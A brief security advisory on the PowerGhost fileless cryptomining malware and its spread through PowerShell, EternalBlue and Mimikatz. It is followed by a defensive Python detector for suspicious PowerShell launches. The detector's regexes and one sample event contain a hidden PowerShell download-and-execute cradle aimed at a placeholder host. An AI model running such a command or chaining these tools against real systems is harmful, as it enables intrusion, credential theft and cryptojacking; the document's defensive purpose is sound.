Fileless Malware Targeting Corporate Systems
Threat actors are deploying a new fileless malware to target corporate networks across the world. Dubbed PowerGhost, the fileless malware is distributed by infecting a single system in a business network and then propagates to other computers and servers on the network via PowerShell, EternalBlue, and Mimikatz. Once infected, devices are used to mine cryptocurrency, allowing threat actors to make a quick profit as the number of infected devices increases. The infection process begins with the attacker deploying exploits or remote administration tools such as Windows Management Instrumentation. During the infection process, a one-line PowerShell script runs and downloads a cryptocurrency miner, Mimikatz, EternalBlue exploit shellcode, and a reflective PE injection module. Once one machine is infected, Mimikatz is used to collect account credentials from the current machine and works together with the EternalBlue exploit to propagate through the network and infect additional devices. The NJCCIC recommends users and administrators review SecureList’s blog post for more information and keep all software patched and up-to-date to prevent the exploitation of known vulnerabilities.
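A defender-side check for the chain described above, as an added example that is not from the NJCCIC advisory or SecureList's analysis: it scores constructed process-creation events (a simplified Sysmon Event ID 1 / Windows 4688 shape with Image, ParentImage and CommandLine fields) for PowerShell launched through the WMI provider host, a download cradle in the command line, and hidden or policy-bypass switches, and flags an event only when at least two traits coincide. The event records, process IDs and defanged URL are constructed; the field names and the two-trait threshold are assumptions.

```python
"""Heuristic detection of PowerGhost-style fileless PowerShell activity.

Added example, not code from the advisory or from SecureList. Events are a
constructed simplification of Sysmon ID 1 / Windows 4688 fields (assumption).
"""
import re
from typing import Dict, List, Tuple

# Traits matching the advisory: a one-line PowerShell script, started via WMI,
# that pulls further stages straight into memory instead of onto disk.
DOWNLOAD_CRADLE = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b"
    r"|\bIEX\b|Invoke-Expression)", re.I)
HIDDEN_FLAGS = re.compile(
    r"(-enc\w*\s|-w(indowstyle)?\s+hidden|-nop\b|-noni\b"
    r"|-e(xecution)?p(olicy)?\s+bypass)", re.I)
WMI_HOST = "wmiprvse.exe"
POWERSHELL = ("powershell.exe", "pwsh.exe")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the suspicious traits found in one process-creation event."""
    reasons: List[str] = []
    if _basename(ev.get("Image", "")) not in POWERSHELL:
        return reasons
    if _basename(ev.get("ParentImage", "")) == WMI_HOST:
        reasons.append("powershell spawned by WMI provider host")
    cmd = ev.get("CommandLine", "")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if HIDDEN_FLAGS.search(cmd):
        reasons.append("hidden/non-interactive/bypass flags")
    return reasons


def detect(events: List[Dict[str, str]], min_traits: int = 2) -> List[Tuple[str, List[str]]]:
    """Flag events with at least min_traits traits; a lone bypass flag from an
    admin script is not enough to alert on."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_traits:
            hits.append((ev["ProcessId"], reasons))
    return hits


# Constructed sample events: benign shell, PowerGhost-like launch, admin script.
SAMPLE_EVENTS = [
    {"ProcessId": "3388", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
    {"ProcessId": "4120", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('hxxp://placeholder.invalid/stage')\""},
    {"ProcessId": "5201", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for pid, why in detect(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(why))
```

In production the same scoring would run over the SIEM's process-creation feed, with the WMI-parent trait weighted highest because the advisory ties initial deployment to WMI.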